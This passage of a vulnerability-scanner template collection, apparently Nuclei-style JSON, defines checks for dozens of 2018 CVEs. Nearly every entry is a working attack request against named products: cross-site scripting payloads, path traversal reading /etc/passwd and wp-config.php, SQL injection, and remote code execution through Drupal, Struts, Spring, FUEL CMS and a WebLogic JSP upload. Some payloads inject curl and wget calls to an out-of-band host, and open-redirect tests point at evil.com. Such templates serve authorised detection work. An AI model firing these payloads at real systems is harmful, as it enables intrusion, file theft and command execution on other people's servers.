support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open 